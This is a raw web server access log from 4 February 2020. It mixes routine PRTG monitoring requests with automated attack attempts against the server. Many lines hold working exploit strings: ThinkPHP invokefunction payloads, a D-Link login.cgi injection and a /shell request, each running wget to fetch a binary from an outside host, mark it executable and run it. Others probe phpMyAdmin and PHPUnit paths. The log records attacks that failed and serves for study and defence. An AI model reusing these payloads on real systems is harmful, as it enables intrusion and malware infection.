125.72.69.122 - - [04/Feb/2020:16:14:52 +0100] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:52 +0100] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:52 +0100] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:53 +0100] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:53 +0100] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:53 +0100] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:53 +0100] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:53 +0100] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:54 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [04/Feb/2020:16:15:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.118.71.13 - - [04/Feb/2020:16:16:06 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
49.68.246.198 - - [04/Feb/2020:16:16:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.123.4.234/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Feb/2020:16:16:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.34.174.100 - - [04/Feb/2020:16:17:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.101.0.209 - - [04/Feb/2020:16:17:33 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:17:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [04/Feb/2020:16:18:10 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:18:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [04/Feb/2020:16:19:12 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:19:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:20:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:21:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.114.166.245 - - [04/Feb/2020:16:22:17 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:22:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.130.149.65 - - [04/Feb/2020:16:23:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.130.149.65 - - [04/Feb/2020:16:23:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:23:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [04/Feb/2020:16:24:31 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:24:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:25:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.72.95.111 - - [04/Feb/2020:16:25:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:26:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:27:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.119.197 - - [04/Feb/2020:16:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [04/Feb/2020:16:28:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.105.196.130 - - [04/Feb/2020:16:28:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
212.91.246.72 - - [04/Feb/2020:16:29:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.106.113.65 - - [04/Feb/2020:16:29:51 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
212.91.246.72 - - [04/Feb/2020:16:30:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:31:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:32:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.229.123 - - [04/Feb/2020:16:32:50 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:33:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:34:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:35:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:36:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.115.250.89 - - [04/Feb/2020:16:36:56 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:37:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.120.250.174 - - [04/Feb/2020:16:38:31 +0100] "GET /pc/SHAREitSubscript\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 320 "-" "Karu/2.0"
212.91.246.72 - - [04/Feb/2020:16:38:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:39:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:40:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.112.162.127 - - [04/Feb/2020:16:41:36 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:41:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.189.87.38 - - [04/Feb/2020:16:41:53 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
78.189.87.38 - - [04/Feb/2020:16:41:53 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:42:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:43:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.167.133 - - [04/Feb/2020:16:45:05 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
197.50.94.12 - - [04/Feb/2020:16:45:20 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:45:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.102.75.189 - - [04/Feb/2020:16:46:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:46:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.22.191.212 - - [04/Feb/2020:16:46:58 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:47:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:48:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:49:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.105.196.130 - - [04/Feb/2020:16:50:03 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
41.155.248.3 - - [04/Feb/2020:16:50:26 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:50:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.89.195.61 - - [04/Feb/2020:16:50:57 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:51:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.134.170.31 - - [04/Feb/2020:16:52:04 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:52:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.118.227.75 - - [04/Feb/2020:16:53:03 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.141.172.33 - - [04/Feb/2020:16:54:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.164.83.246 - - [04/Feb/2020:16:55:23 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:55:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:56:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:57:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:58:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:16:59:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:00:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.68.112.178 - - [04/Feb/2020:17:01:08 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
183.80.0.0 - - [04/Feb/2020:17:01:38 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:01:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:02:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.25.91.135 - - [04/Feb/2020:17:03:16 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:03:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:04:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.234.125.157 - - [04/Feb/2020:17:05:24 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:05:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:06:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.15.213 - - [04/Feb/2020:17:07:09 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:07:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:08:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:09:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:10:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.108.66.64 - - [04/Feb/2020:17:11:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
178.93.44.44 - - [04/Feb/2020:17:11:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:11:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.48.178 - - [04/Feb/2020:17:12:13 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
66.240.205.34 - - [04/Feb/2020:17:12:13 +0100] "Gh0st\xad" 501 321 "-" "-"
118.71.247.157 - - [04/Feb/2020:17:12:26 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:12:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:13:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:14:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.119.205.109 - - [04/Feb/2020:17:14:54 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:15:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.51.57 - - [04/Feb/2020:17:16:05 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:16:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.81.96.185 - - [04/Feb/2020:17:16:48 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:17:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:18:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.235.224.2 - - [04/Feb/2020:17:19:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.235.224.2 - - [04/Feb/2020:17:19:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:19:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.52.242.9 - - [04/Feb/2020:17:19:55 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:20:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:21:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:22:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.251.43.163 - - [04/Feb/2020:17:23:13 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
